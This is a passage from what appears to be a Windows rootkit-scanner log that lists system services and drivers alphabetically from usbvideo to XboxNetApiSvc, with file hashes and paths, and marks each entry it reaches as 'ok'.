21:37:31.0907 0x1ac0 [ 1854D3C5FBBA761BE838B58F2C96B3A6, 12042C28884F417C6B36648FC0CA8FB75D8732542B6384D8362E7BC9C8417C3E ] usbvideo C:\WINDOWS\System32\Drivers\usbvideo.sys
21:37:31.0923 0x1ac0 usbvideo - ok
21:37:31.0923 0x1ac0 [ 50E70B3A95138AA4A30B095270EE0DE6, 9B7072C36230102A089C4A6DFE1980CD9DB28E566EF02830600DEBAF3AAD31C7 ] USBXHCI C:\WINDOWS\System32\drivers\USBXHCI.SYS
21:37:31.0938 0x1ac0 USBXHCI - ok
21:37:31.0970 0x1ac0 [ 3156FFFB2B3BF5375814F777D343AD9F, C4E63043EB9D9227CDD487608AF9BA25C755D85E5FF8E63C2079D68CCC79E4BB ] UserDataSvc C:\WINDOWS\System32\userdataservice.dll
21:37:32.0079 0x1ac0 UserDataSvc - ok
21:37:32.0126 0x1ac0 [ C0E60CC6D48013728C7E4168D61A0B39, CA283312E9669BCC74A3B5E6332502D1CAA7148C049B94AF3996F3C7CD2676EF ] UserManager C:\WINDOWS\System32\usermgr.dll
21:37:32.0188 0x1ac0 UserManager - ok
21:37:32.0204 0x1ac0 [ 86FF5780D885B09F3C4CD62145470CB1, B0070E3567A7F8E993F2650E251026DF0A4FA0D3F5258C4F88D9819F9B9EC395 ] UsoSvc C:\WINDOWS\system32\usocore.dll
21:37:32.0235 0x1ac0 UsoSvc - ok
21:37:32.0251 0x1ac0 [ D46604714C0BE35D0298514B2E4A7B34, 3EEFF41D198C92CC4CD8974C6575839D89A2139B64C8B08D10FB516660A2F7BD ] valWBFPolicyService C:\WINDOWS\system32\valWBFPolicyService.exe
21:37:32.0266 0x1ac0 valWBFPolicyService - ok
21:37:32.0266 0x1ac0 [ 151F02D8A7E5CB7765E7C2BA5B0AD1D4, B7A3D233046510FEC6866020490B14B3A544BFC82A14D457FBD6D821E20635D5 ] valWbioSyncSvc C:\WINDOWS\system32\valWbioSyncSvc.exe
21:37:32.0282 0x1ac0 valWbioSyncSvc - ok
21:37:32.0282 0x1ac0 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] VaultSvc C:\WINDOWS\system32\lsass.exe
21:37:32.0298 0x1ac0 VaultSvc - ok
21:37:32.0313 0x1ac0 [ C1EC9211C7759D2487FD30934AA3EE96, 6914BB8B44550DFE75E5A3772E93ADF8459EB621CA400BDD9B7E3185A09B6F9A ] vdrvroot C:\WINDOWS\system32\drivers\vdrvroot.sys
21:37:32.0329 0x1ac0 vdrvroot - ok
21:37:32.0345 0x1ac0 [ 374CD93271184F04988FDC1C25B3E855, 09727093C5F7B258867C16D41F7F9835BF549CC339288BFE01A8F34AC7E93E23 ] vds C:\WINDOWS\System32\vds.exe
21:37:32.0454 0x1ac0 vds - ok
21:37:32.0485 0x1ac0 [ C83F3BC00651448DB127D497CF955089, 31B8838CEED08E7D5DD8635A805A8010798BD9B10A3775FAFDB576FBD7303D39 ] VerifierExt C:\WINDOWS\system32\drivers\VerifierExt.sys
21:37:32.0548 0x1ac0 VerifierExt - ok
21:37:32.0579 0x1ac0 [ 0E12F5F6B1C813D17AFDA197C4394423, B0AFDFE0E12633C6D984DA366197BE09ED2649BAFF525FA0DE84701E5B335DB9 ] vhdmp C:\WINDOWS\System32\drivers\vhdmp.sys
21:37:32.0626 0x1ac0 vhdmp - ok
21:37:32.0641 0x1ac0 [ 1AD096A5C00E522398D0092D875A8CB6, 6959FCD6DD2115CD293DBD4BCD6D1BA0AE4F7495A9BBB48F7388384EEABB38E9 ] vhf C:\WINDOWS\System32\drivers\vhf.sys
21:37:32.0657 0x1ac0 vhf - ok
21:37:32.0673 0x1ac0 [ EE9A22CFD9AEDD7B52F98B0272494609, F668131BABD048857F011A471936B52EDF0F2A42CB6000ACB4E0E43F88782AAD ] vmbus C:\WINDOWS\system32\drivers\vmbus.sys
21:37:32.0688 0x1ac0 vmbus - ok
21:37:32.0688 0x1ac0 [ BFBD0895926FD98A03AD6BB845B569B7, 5B7913ACD6CC132B2F36B079BC5F897C21884A7F21046B8996CC3D74C4B6DA4C ] VMBusHID C:\WINDOWS\System32\drivers\VMBusHID.sys
21:37:32.0704 0x1ac0 VMBusHID - ok
21:37:32.0720 0x1ac0 [ C123C97D351C56C75FE5335AB18255EE, 67315E332E863E5C233BA113826A5DEEE08C1A0A3358E6AC21F25DC5EAC86D07 ] vmgid C:\WINDOWS\System32\drivers\vmgid.sys
21:37:32.0735 0x1ac0 vmgid - ok
21:37:32.0735 0x1ac0 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicguestinterface C:\WINDOWS\System32\icsvc.dll
21:37:32.0782 0x1ac0 vmicguestinterface - ok
21:37:32.0782 0x1ac0 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicheartbeat C:\WINDOWS\System32\icsvc.dll
21:37:32.0798 0x1ac0 vmicheartbeat - ok
21:37:32.0813 0x1ac0 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmickvpexchange C:\WINDOWS\System32\icsvc.dll
21:37:32.0829 0x1ac0 vmickvpexchange - ok
21:37:32.0829 0x1ac0 [ F8F380ABEAFBC589FF6D2D96267C1210, 0CFA3D9E88D984BAFED8E08102BF4DC4077856C6C8C1EBD8D4C4D0D49B673F44 ] vmicrdv C:\WINDOWS\System32\icsvcext.dll
21:37:32.0860 0x1ac0 vmicrdv - ok
21:37:32.0860 0x1ac0 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicshutdown C:\WINDOWS\System32\icsvc.dll
21:37:32.0876 0x1ac0 vmicshutdown - ok
21:37:32.0891 0x1ac0 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmictimesync C:\WINDOWS\System32\icsvc.dll
21:37:32.0907 0x1ac0 vmictimesync - ok
21:37:32.0907 0x1ac0 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicvmsession C:\WINDOWS\System32\icsvc.dll
21:37:32.0923 0x1ac0 vmicvmsession - ok
21:37:32.0938 0x1ac0 [ F8F380ABEAFBC589FF6D2D96267C1210, 0CFA3D9E88D984BAFED8E08102BF4DC4077856C6C8C1EBD8D4C4D0D49B673F44 ] vmicvss C:\WINDOWS\System32\icsvcext.dll
21:37:32.0954 0x1ac0 vmicvss - ok
21:37:32.0954 0x1ac0 [ 0AB9C264F13E2A070A8CF10EDD099ED2, 2E7EB4EE8DCBBCA497CC0E7F4BE057627E9702B6FAF56A7DBCA1325236C880EC ] volmgr C:\WINDOWS\system32\drivers\volmgr.sys
21:37:32.0970 0x1ac0 volmgr - ok
21:37:32.0970 0x1ac0 [ 6EE608257C1137A25B402EF8FC77E83A, 3AE684EBA32563468AD917155C93220F938460A699FBFC3DB8436F83C0C54209 ] volmgrx C:\WINDOWS\system32\drivers\volmgrx.sys
21:37:32.0985 0x1ac0 volmgrx - ok
21:37:33.0001 0x1ac0 [ E3429DBBEA3965BB96E24B16EF4A2551, 0CEE2DEF75C6761DA67AFD3BBF8DEEB1331796719EB84D658B3E517DEC824B49 ] volsnap C:\WINDOWS\system32\drivers\volsnap.sys
21:37:33.0016 0x1ac0 volsnap - ok
21:37:33.0016 0x1ac0 [ 86E790B503C771E674C7DF8FFCBFEFDB, 634B27C4FA363A2165D3D6929D3B22F41EE06198C579A70D446A48830924467B ] volume C:\WINDOWS\system32\drivers\volume.sys
21:37:33.0032 0x1ac0 volume - ok
21:37:33.0032 0x1ac0 [ B25589A0892E6DF8CC07E5CB48BFC954, DA29974426EFD4472A3828FA0EF31AD3860AA8068AB66B5F4BE6A412BC3E73E9 ] vpci C:\WINDOWS\System32\drivers\vpci.sys
21:37:33.0032 0x1ac0 vpci - ok
21:37:33.0048 0x1ac0 [ AA4466A47D2CA7ECE3DCF5256017DCC3, 83414BFBD3DF1CB7417F0F55709E8180D97FA20A74581C34EAAFF667FBEBFD93 ] vsmraid C:\WINDOWS\system32\drivers\vsmraid.sys
21:37:33.0063 0x1ac0 vsmraid - ok
21:37:33.0095 0x1ac0 [ 0BB73BF6FDDD19DE3DE9377EA95E4C64, 74B6E612F9E009A5E43B603BCAD854F3711F6C8A7ED0328B1E3A9B2D4C9EA342 ] VSS C:\WINDOWS\system32\vssvc.exe
21:37:33.0141 0x1ac0 VSS - ok
21:37:33.0157 0x1ac0 [ 98BB6C9AD39D8F2E883093F28282FAEC, 63F4036A1DB23C20AAEEC1CA8ABDE9B46FA09A55EA4E5DB0C0B5D6D58ABAD62F ] VSTXRAID C:\WINDOWS\system32\drivers\vstxraid.sys
21:37:33.0173 0x1ac0 VSTXRAID - ok
21:37:33.0173 0x1ac0 [ B47026E109828102266CBE2F5F9AD113, 28C76B34C48BACEA267A208CC758BB55539323B16300E869AE71B6A99A849AB5 ] vwifibus C:\WINDOWS\System32\drivers\vwifibus.sys
21:37:33.0188 0x1ac0 vwifibus - ok
21:37:33.0204 0x1ac0 [ 799ECD541A9B2764B36A22A095885365, E255E74682927D662294AA3F88FDA211EEE603466EB264E8941C3BACC6A0E530 ] vwififlt C:\WINDOWS\system32\drivers\vwififlt.sys
21:37:33.0220 0x1ac0 vwififlt - ok
21:37:33.0220 0x1ac0 [ 82CA088A33517D1C8571D6850CC13D7E, 0401A08EAF36DB393B74FE8693C60F62EDE10BBC9300C76812C7D01B6AE9A051 ] vwifimp C:\WINDOWS\System32\drivers\vwifimp.sys
21:37:33.0235 0x1ac0 vwifimp - ok
21:37:33.0251 0x1ac0 [ E75460AC4E936BFC0703021DB0BB17B8, D9985C3206B503659FD2F4EE7FD0B9AF8CB2DE821BFD68B13C9E3BD9CE5AEF6B ] W32Time C:\WINDOWS\system32\w32time.dll
21:37:33.0282 0x1ac0 W32Time - ok
21:37:33.0298 0x1ac0 [ A57B80F078FE71DEC1D0487DA70A56FD, F26F273BB45CBCACE440B08FF14C05D1B89046AE669195B4DAD50129835B1D9C ] w3logsvc C:\WINDOWS\system32\inetsrv\w3logsvc.dll
21:37:33.0298 0x1ac0 w3logsvc - ok
21:37:33.0313 0x1ac0 [ 08088DC69903630B80EEC8DB3C87FB1D, 939215139C185317B103516644F8B76DDC8C8A42078887C7E750A317E691C456 ] W3SVC C:\WINDOWS\system32\inetsrv\iisw3adm.dll
21:37:33.0345 0x1ac0 W3SVC - ok
21:37:33.0345 0x1ac0 [ F0F477541F7AF67CC05DA1CF4921A500, F7DD2F49B61C484596DE3893683B1172A138386BD71F54BFCF37A31005C7368F ] WacomPen C:\WINDOWS\System32\drivers\wacompen.sys
21:37:33.0360 0x1ac0 WacomPen - ok
21:37:33.0360 0x1ac0 [ A0957CBC1C054A87EE7A65A994102A96, CB6339F3F67D0E33C26E6756F88869574B84426B20C907E094F83B9DC5E36A3E ] WalletService C:\WINDOWS\system32\WalletService.dll
21:37:33.0391 0x1ac0 WalletService - ok
21:37:33.0391 0x1ac0 [ FDD16EF9177A8A2EF08A7FA3D3EFAA13, 148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
21:37:33.0423 0x1ac0 wanarp - ok
21:37:33.0423 0x1ac0 [ FDD16EF9177A8A2EF08A7FA3D3EFAA13, 148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarpv6 C:\WINDOWS\system32\DRIVERS\wanarp.sys
21:37:33.0438 0x1ac0 wanarpv6 - ok
21:37:33.0454 0x1ac0 [ 08088DC69903630B80EEC8DB3C87FB1D, 939215139C185317B103516644F8B76DDC8C8A42078887C7E750A317E691C456 ] WAS C:\WINDOWS\system32\inetsrv\iisw3adm.dll
21:37:33.0470 0x1ac0 WAS - ok
21:37:33.0532 0x1ac0 [ EA0524A2A01792796EC80AE2FE08307A, 68CC0F3451C6797222411C276376C7741C96C45E628DD77FB1FB17C10DC0EA8A ] wbengine C:\WINDOWS\system32\wbengine.exe
21:37:33.0688 0x1ac0 wbengine - ok
21:37:33.0735 0x1ac0 [ 5E3E24AA72FA75D6322C7286917BEB4A, 97D0CF00873A5A70C1B4A73AD41F4053B22810DA37FF2E8528D510216311FEE1 ] WbioSrvc C:\WINDOWS\System32\wbiosrvc.dll
21:37:33.0798 0x1ac0 WbioSrvc - ok
21:37:33.0813 0x1ac0 [ 2B7CCCFBB166100842D31440228588CF, FC0BE611C5497A0579E7D8F268BBE1BD520A8A764F112C7C5CC631767B683B79 ] wcifs C:\WINDOWS\system32\drivers\wcifs.sys
21:37:33.0813 0x1ac0 wcifs - ok
21:37:33.0845 0x1ac0 [ E00FE13E415C97C60E5A418965372A74, E74EBE34D3056F52231C7B12E6294AED1C4F02219E853D5E70AA05D823C800D5 ] Wcmsvc C:\WINDOWS\System32\wcmsvc.dll
21:37:33.0876 0x1ac0 Wcmsvc - ok
21:37:33.0891 0x1ac0 [ 2C396871F724DDF871A2EF4CADE5151D, 8CAD8A393F0CC447432E1BED21A691E25356F7DBC06E3887138A6F86CB1D656D ] wcncsvc C:\WINDOWS\System32\wcncsvc.dll
21:37:33.0923 0x1ac0 wcncsvc - ok
21:37:33.0923 0x1ac0 [ 1737BEF60CA384423CE4B32AF1C2BFFC, D61353D3B2EAEDFDCBB5DB3AD27E76396CC7755AFF01233307EAA1967493DE63 ] wcnfs C:\WINDOWS\system32\drivers\wcnfs.sys
21:37:33.0938 0x1ac0 wcnfs - ok
21:37:33.0938 0x1ac0 [ 38130C1C5FE0E08820EE57E1B087B659, 3705AA4699D4C402C0BBC5BC4E1EE67CB4A4B9C27702E88952A76891C3A3F496 ] WdBoot C:\WINDOWS\system32\drivers\WdBoot.sys
21:37:33.0954 0x1ac0 WdBoot - ok
21:37:33.0954 0x1ac0 [ A556768CC1FA4F36022BEE2F0EDE2566, 3A4BC9DE614F43CD94FA354A565C66B2E1E36C0608D84C6288010B97B9D811AA ] WDC_SAM C:\WINDOWS\System32\drivers\wdcsam64.sys
21:37:33.0954 0x1ac0 WDC_SAM - ok
21:37:33.0985 0x1ac0 [ 0C6CBF3490EE5F0D62B5820568CA30B8, 97EDEC84DA72A900D7740B8763DDDAB600628F3F1E1DDE1212383C2E60FDC77C ] Wdf01000 C:\WINDOWS\system32\drivers\Wdf01000.sys
21:37:34.0016 0x1ac0 Wdf01000 - ok
21:37:34.0016 0x1ac0 [ F7B6CB0F9ECD28848E2BDACEAB0D9204, B64D91A36600AEBE656F0514AF8653C294DE88054FE6DBB7B1A6D0A23D2A5131 ] WdFilter C:\WINDOWS\system32\drivers\WdFilter.sys
21:37:34.0048 0x1ac0 WdFilter - ok
21:37:34.0048 0x1ac0 [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiServiceHost C:\WINDOWS\system32\wdi.dll
21:37:34.0063 0x1ac0 WdiServiceHost - ok
21:37:34.0079 0x1ac0 [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiSystemHost C:\WINDOWS\system32\wdi.dll
21:37:34.0095 0x1ac0 WdiSystemHost - ok
21:37:34.0126 0x1ac0 [ 2974422E31DBC953A585A065EF736948, B2E689579C12B1A8B2CB4F04875157E894CE747DF56A9B7083E04A8C9B85EAC5 ] wdiwifi C:\WINDOWS\system32\DRIVERS\wdiwifi.sys
21:37:34.0188 0x1ac0 wdiwifi - ok
21:37:34.0204 0x1ac0 [ 82A4F22C884B4BAE8B531640859F9871, 1C662557F671FA680E7CC2FC565B198470E421778BD03749CD05B2928568C430 ] WdNisDrv C:\WINDOWS\system32\Drivers\WdNisDrv.sys
21:37:34.0204 0x1ac0 WdNisDrv - ok
21:37:34.0220 0x1ac0 WdNisSvc - ok
21:37:34.0220 0x1ac0 [ 9066FE8EAB91E15437CB3C43757F2A65, 1F8B3D8C90C7862CCAB91D170F49E7F1D58FABAFA1C8DDDE1796404D1DD98707 ] WebClient C:\WINDOWS\System32\webclnt.dll
21:37:34.0251 0x1ac0 WebClient - ok
21:37:34.0251 0x1ac0 [ F322B8E6C5614E7975C8BF34B7A6710E, 299816001856E8C91BFBB9C48D87B7ACBD5A39F6A65147F5AE6EDB3065A893E9 ] Wecsvc C:\WINDOWS\system32\wecsvc.dll
21:37:34.0282 0x1ac0 Wecsvc - ok
21:37:34.0282 0x1ac0 [ 04CA184EB5743DE5A2CCEEF2DB2DA8B3, E16921496F57B78A152A103F8D58601C9687360048A6CB51E76A96E3B64CC0FA ] WEPHOSTSVC C:\WINDOWS\system32\wephostsvc.dll
21:37:34.0298 0x1ac0 WEPHOSTSVC - ok
21:37:34.0313 0x1ac0 [ BA78F20F7FD7709EA3AAAD91F8535EDA, D1DFBFCBBB8D4D992FBF3B340DB6A2F5DDC7E55F52E1100297EA2004FF752A2B ] wercplsupport C:\WINDOWS\System32\wercplsupport.dll
21:37:34.0329 0x1ac0 wercplsupport - ok
21:37:34.0345 0x1ac0 [ E5AE3B23620126483B957BDFF38FE7B7, 306AAA0B37F3914FE590A5DBFBF640C79173150C006BC7A6CF1683D85C0AFC5F ] WerSvc C:\WINDOWS\System32\WerSvc.dll
21:37:34.0376 0x1ac0 WerSvc - ok
21:37:34.0391 0x1ac0 [ 51D61CA3CED9A0C4E5501EEDBD48039F, 95F9CC67537DEABE501B59351624F02126BC9B9DBB72016423FF997090A2128B ] WFDSConMgrSvc C:\WINDOWS\System32\wfdsconmgrsvc.dll
21:37:34.0423 0x1ac0 WFDSConMgrSvc - ok
21:37:34.0438 0x1ac0 [ 3C8F0ABD00E197101DCF43FEF8FB0D76, AF5C68B85EE1503ACD4AEA1D997F816C34293A77791D59A605DC18450B4906DE ] WFPLWFS C:\WINDOWS\system32\drivers\wfplwfs.sys
21:37:34.0454 0x1ac0 WFPLWFS - ok
21:37:34.0454 0x1ac0 [ 2DEB40D6837956CE08A8F9EB3ECA5A01, B40D23E54CDF6BE05D6C5DA536BF6D998E79EDE9C391A42452F9F69EE206EA1E ] WiaRpc C:\WINDOWS\System32\wiarpc.dll
21:37:34.0470 0x1ac0 WiaRpc - ok
21:37:34.0485 0x1ac0 [ F6940C388C10E41FDA8FC74EA8061FB4, 7FA31501B2FBF684C832E6E7A254550CAAFA41176CE7B24F930B6BD4EE68168D ] WIBUKEY C:\WINDOWS\system32\DRIVERS\WibuKey64.sys
21:37:34.0485 0x1ac0 WIBUKEY - ok
21:37:34.0501 0x1ac0 [ 75014BF6510D4C6C69EEE5B7743A52AF, 11AEEF4D52C35E5A7006713836ECF1198A53CD02736E792B1C698144CA1363F0 ] WIMMount C:\WINDOWS\system32\drivers\wimmount.sys
21:37:34.0501 0x1ac0 WIMMount - ok
21:37:34.0501 0x1ac0 WinDefend - ok
21:37:34.0516 0x1ac0 [ C8EBCFED8FD2CDF725E44AF93016621E, A0B76E55CC535A0F1D79C3C0EC59753086EAB669EC7ADA4F97656DCAD2A69448 ] WindowsTrustedRT C:\WINDOWS\system32\drivers\WindowsTrustedRT.sys
21:37:34.0532 0x1ac0 WindowsTrustedRT - ok
21:37:34.0532 0x1ac0 [ D318557F9D7CA3836104F0B8ECB1F32E, 6850BBFB4F65167B052F3CA22FD72E9188A14FD2A9CC085861B4BC40CBA34249 ] WindowsTrustedRTProxy C:\WINDOWS\system32\drivers\WindowsTrustedRTProxy.sys
21:37:34.0548 0x1ac0 WindowsTrustedRTProxy - ok
21:37:34.0563 0x1ac0 [ 61F0D6574577499FB43D9F4870B08A7F, 757ACD4F292C43B04B6428D84A7147DE8E565716D94B6B02F288F3B5E2D1C135 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll
21:37:34.0595 0x1ac0 WinHttpAutoProxySvc - ok
21:37:34.0610 0x1ac0 [ 31DDF1D001336B2DCE7DF24E99EF1D04, A1FCABF4A263BFAE042FE7A9F6C15FD9B3D8E985278C32AE8975ECE79B341277 ] WinMad C:\WINDOWS\System32\drivers\winmad.sys
21:37:34.0626 0x1ac0 WinMad - ok
21:37:34.0626 0x1ac0 [ 9A26F7834706A6D8C8824EB08FD7C362, 750F6A0759D70BE481C70FE4BB21D18E756A8F0C23A014C2CE1E7729A1E625FE ] Winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
21:37:34.0657 0x1ac0 Winmgmt - ok
21:37:34.0657 0x1ac0 [ 2E1A614EFB0523E20860AE7978DDA0A4, E13564690F9977747CA676D3843B467506447F060A5FF6676835A9C7A30BA409 ] WinNat C:\WINDOWS\system32\drivers\winnat.sys
21:37:34.0673 0x1ac0 WinNat - ok
21:37:34.0735 0x1ac0 [ 27DAA9AA3E03C1068678D5659461BB32, AFDED6D671C430F296C9EAA73590111D6A8A9FA93DFE0595B90467FFE28EFB35 ] WinRM C:\WINDOWS\system32\WsmSvc.dll
21:37:34.0845 0x1ac0 WinRM - ok
21:37:34.0845 0x1ac0 [ 03858B18BB6DF6A400D9FC5153FD28A8, C7AD69B022AEFDDDAFB74CCCDF20AF9CCDBA0097634BBBD07A2EFBA5922560C1 ] WINUSB C:\WINDOWS\System32\drivers\WinUSB.SYS
21:37:34.0876 0x1ac0 WINUSB - ok
21:37:34.0876 0x1ac0 [ 0BF4A43CF1F3A4D50AFA4561C3B4628D, 2D0B4E7004C8AC8A9EE07E6D5241BF32395CA142BF3B03FA9CF00BC6720A6AC7 ] WinVerbs C:\WINDOWS\System32\drivers\winverbs.sys
21:37:34.0907 0x1ac0 WinVerbs - ok
21:37:34.0923 0x1ac0 [ 11DDD4C9BDF095A5F5B5ACA98FBBF7A2, CFA76C197987CC9EBFE4AC2AD6FE9A9620819B50E9DD423BCE13F7DB5DA641D8 ] wisvc C:\WINDOWS\system32\flightsettings.dll
21:37:34.0985 0x1ac0 wisvc - ok
21:37:35.0032 0x1ac0 [ E624376E7E7D9AC203113140D9E618A2, 3553D343665194492E38B8C437DE429CEAC135D69EC0CB951BA3E3A7549F673E ] WlanSvc C:\WINDOWS\System32\wlansvc.dll
21:37:35.0126 0x1ac0 WlanSvc - ok
21:37:35.0188 0x1ac0 [ 2393C4DB3DF3D19B0B920AD607098E79, D632671247DE3808D9C5B36A3FF173C86BB3AD274D03C851BCD417CE62B3820D ] wlidsvc C:\WINDOWS\system32\wlidsvc.dll
21:37:35.0282 0x1ac0 wlidsvc - ok
21:37:35.0313 0x1ac0 [ E5AB2E0B4F766E34AFC768D9769A24D7, 0DE04B2F43B9DCC92F9215B1058EE4ABA228B9986051CF39959555C12DF017B3 ] wlpasvc C:\WINDOWS\System32\lpasvc.dll
21:37:35.0376 0x1ac0 wlpasvc - ok
21:37:35.0376 0x1ac0 [ 0D6E1347A891607759340B1E55BA2A77, 033DF14920A581FE7E21C6930280AE159B5634F2FEAF79423E8D0B7D46500048 ] WmiAcpi C:\WINDOWS\System32\drivers\wmiacpi.sys
21:37:35.0376 0x1ac0 WmiAcpi - ok
21:37:35.0391 0x1ac0 [ F7B122E8A238354DE344B77216E8D9AC, 3C4F864655CFF786B33333E643AA929B2D2B01ECD56EEEEADE7CEAB38249DA3B ] wmiApSrv C:\WINDOWS\system32\wbem\WmiApSrv.exe
21:37:35.0407 0x1ac0 wmiApSrv - ok
21:37:35.0407 0x1ac0 WMPNetworkSvc - ok
21:37:35.0423 0x1ac0 [ 1AE1076034392218EE89D2744EC2A071, 695C28E2697B12BBD919687176CE082E94887A5D8B6229F163A26F6EDF401C4C ] Wof C:\WINDOWS\system32\drivers\Wof.sys
21:37:35.0438 0x1ac0 Wof - ok
21:37:35.0470 0x1ac0 [ D571821EDAA1F23EB521314FB9AA1C88, 7F16E6915060BD5FABE0805284631F92EEC11234579D09C3CEDDBF73D312E7F5 ] workfolderssvc C:\WINDOWS\system32\workfolderssvc.dll
21:37:35.0563 0x1ac0 workfolderssvc - ok
21:37:35.0563 0x1ac0 [ 2AD9CC8445F0E1A8900A9DE123643CD2, A5928B26722DFBB201A32DEF48B25D4BF291815EA68CF50CBE79EEA9260A71E3 ] WPDBusEnum C:\WINDOWS\system32\wpdbusenum.dll
21:37:35.0595 0x1ac0 WPDBusEnum - ok
21:37:35.0595 0x1ac0 [ 1FD80CBB192A20375F3664639DEB57B5, 7A4789D4B2F8E289726E1C723DC00D5AC1F8C5E00FB2879C9D0E6DDC97D2B1A6 ] WpdUpFltr C:\WINDOWS\system32\drivers\WpdUpFltr.sys
21:37:35.0610 0x1ac0 WpdUpFltr - ok
21:37:35.0610 0x1ac0 [ 3369EF007E43B88EAC8F1789B43D4393, 347F9F7DF980BB739895EDFE72E2E595EF56634330DC63DAA36403AB232B5B5A ] WpnService C:\WINDOWS\system32\WpnService.dll
21:37:35.0641 0x1ac0 WpnService - ok
21:37:35.0657 0x1ac0 [ 41403B9466EDA80FACD7713478A56DF8, A71BF9C7A2483FE1F660AC9688FCB38BA2310F16A69EB117C948458364953F34 ] WpnUserService C:\WINDOWS\System32\WpnUserService.dll
21:37:35.0673 0x1ac0 WpnUserService - ok
21:37:35.0673 0x1ac0 [ DAF4451760B46CB383D287C4FAFFE97D, 658AFE31EF50E934FEDD2E7048257DBFE9E6DE5F1ACDC658B21737391CF1CC5A ] ws2ifsl C:\WINDOWS\system32\drivers\ws2ifsl.sys
21:37:35.0688 0x1ac0 ws2ifsl - ok
21:37:35.0704 0x1ac0 [ D4A0661AB0FE542460CA76BFB4FAA2D6, 149F0A0720C47BFFCA68165A46382E5CBB273F48483DBB598CEA320801664718 ] wscsvc C:\WINDOWS\System32\wscsvc.dll
21:37:35.0720 0x1ac0 wscsvc - ok
21:37:35.0720 0x1ac0 WSearch - ok
21:37:35.0813 0x1ac0 [ 05BEDBBEEAAC22F98FCA529FAC659582, E4D2FFF98034E2E7FE0478AB9C8D677CA932349A976DFC0C2B65DB15C71354B4 ] wuauserv C:\WINDOWS\system32\wuaueng.dll
21:37:35.0954 0x1ac0 wuauserv - ok
21:37:35.0954 0x1ac0 [ 455609BF60DA3B57EEAB863DEFCCF14D, F55271C42B7AFD17D01275703719C1F52C21996DB82AC78A70A8A8B62370623B ] WudfPf C:\WINDOWS\system32\drivers\WudfPf.sys
21:37:35.0970 0x1ac0 WudfPf - ok
21:37:35.0985 0x1ac0 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFRd C:\WINDOWS\System32\drivers\WUDFRd.sys
21:37:36.0001 0x1ac0 WUDFRd - ok
21:37:36.0001 0x1ac0 [ 9EFE23CA208BF4B613FF4A6028DFAB10, 483D8D8DA578BF3EA5617EAB42457543EC6F97C1977BDD8ABFDF854AE3AAFD35 ] wudfsvc C:\WINDOWS\System32\WUDFSvc.dll
21:37:36.0016 0x1ac0 wudfsvc - ok
21:37:36.0016 0x1ac0 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFWpdFs C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
21:37:36.0032 0x1ac0 WUDFWpdFs - ok
21:37:36.0063 0x1ac0 [ 3EEF7185E0974D9AB2D65CA3214132CF, 44DB1D11B6B1D180F59AB3FE4D7235F7F2FD709A853F6A64E8E379FFFD16CD3C ] WwanSvc C:\WINDOWS\System32\wwansvc.dll
21:37:36.0126 0x1ac0 WwanSvc - ok
21:37:36.0141 0x1ac0 [ FC0147AB34C7CDB2D8A1B29C207F2CD1, 737D40A4BE35AD13C091D8E320FAD3FD7C0C7E41C8B50E48D3C2151712A55718 ] xbgm C:\WINDOWS\System32\xbgmsvc.dll
21:37:36.0157 0x1ac0 xbgm - ok
21:37:36.0173 0x1ac0 [ 8C7C5945C3545CA767BE111D78C15314, 5A938679DA3EDA2D9CA7034908DFEFCC7DAADB10DFD0CF4ECE882FF536D1BFA2 ] XblAuthManager C:\WINDOWS\System32\XblAuthManager.dll
21:37:36.0204 0x1ac0 XblAuthManager - ok
21:37:36.0235 0x1ac0 [ A8BD191F46CC58E45637CB3E262CF0F2, CA65524427ECDB5E1138A5F8E885566064E507BA60FC31E0D9D17B9556CC9ADC ] XblGameSave C:\WINDOWS\System32\XblGameSave.dll
21:37:36.0298 0x1ac0 XblGameSave - ok
21:37:36.0313 0x1ac0 [ B10655A4C2EFDC25483D670EF52A4854, 2D9DC81AE73FDFE7F4E395BEC8E806E6BAD8DE0470027EEEC256AC4A4B7C7AA4 ] xboxgip C:\WINDOWS\System32\drivers\xboxgip.sys
21:37:36.0345 0x1ac0 xboxgip - ok
21:37:36.0345 0x1ac0 [ E099DED5C602AE4A7ECCF7CD4B1D2E33, 7FDAFFE13B87A8E6AA8721F8905FFF6EF04CAB93009F68EDA862B57EBB04514F ] XboxGipSvc C:\WINDOWS\System32\XboxGipSvc.dll
21:37:36.0360 0x1ac0 XboxGipSvc - ok
21:37:36.0391 0x1ac0 [ EF83C2EF7F152DFDC6D9F1AEC6FBE66F, 21D4FCD12F9D40D066F05936131A4F7BAB301DD800C85921476EC182B9D27D0B ] XboxNetApiSvc C:\WINDOWS\system32\XboxNetApiSvc.dll
21:37:36.0454 0x1ac0 XboxNetApiSvc - ok
